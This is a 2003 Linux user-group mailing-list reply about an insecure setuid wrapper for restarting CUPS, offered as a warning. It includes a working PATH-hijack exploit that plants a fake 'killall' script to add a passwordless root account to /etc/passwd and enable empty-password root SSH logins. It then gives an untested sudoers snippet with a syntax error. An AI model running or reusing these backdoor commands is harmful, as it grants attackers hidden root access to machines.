[nSLUG] chmod +s , cupsd restart

Jamie Fifield jamie at fifield.ca
Thu Jun 19 17:36:27 ADT 2003


cat > /tmp/killall << EOF
#! /bin/sh
echo "rooter::0:0::/:/bin/sh" >> /etc/passwd
f=/etc/ssh/sshd_config
[ -f $f ] && echo "PermitRootLogin yes" >> $f
[ -f $f ] && echo "PermitEmptyPasswords yes" >> $f
f=/usr/local/etc/ssh/sshd_config
[ -f $f ] && echo "PermitRootLogin yes" >> $f
[ -f $f ] && echo "PermitEmptyPasswords yes" >> $f
EOF
PATH="/tmp:$PATH" ./a.out


Don't write your own suid wrappers.  Use sudo:

user=`whoami` && [ $user == "root ] || echo "run as root dummy"
cat >> /etc/sudoers << EOF
User_Alias CUPS=root,donald
CUPS ALL = NOPASSWD: /etc/init.d/cupsysd
EOF

I just made this up, it may or may not work as advertised.

On Thu, Jun 19, 2003 at 05:10:40PM -0300, Donald Teed wrote:
> On Thu, 19 Jun 2003, Peter Cordes wrote:
> 
> >  The conventional wisdom about suid wrapper programs is that you should use
> > exec(2), _not_ system(3), because system pays attention to all kinds of
> > environment variables, and so is easier to exploit (i.e. harder to use
> > securely).
> > 
> >  You could do away with the script entirely, and execl(2) killall -HUP
> > cupsd.  (or even write your own code to read /var/run/cupsd.pid and kill(2)
> > that pid.
> 
> Thanks for the tip/suggestion.
> 
> Here is what I tried.  It looked promising, but it
> didn't actually trigger cupsd to reset.
> 
> I made this program:
> 
> main()
> { execl ("killall -HUP cupsd"); }
> 
> I compiled it, and did a chmod +s on a.out.  An ordinary
> user could run it fine.  But no reset noted in /var/log/cups/error.log.
> If I ran a.out as root I do see a verification of
> cupsd rereading the files (as intended) in error.log
> 
> Any ideas?
> 
> 
> 
> _______________________________________________
> nSLUG mailing list
> nSLUG at nslug.ns.ca
> http://nslug.ns.ca/cgi-bin/mailman/listinfo/nslug

-- 
Jamie Fifield
<jamie at fifield.ca>




More information about the nSLUG mailing list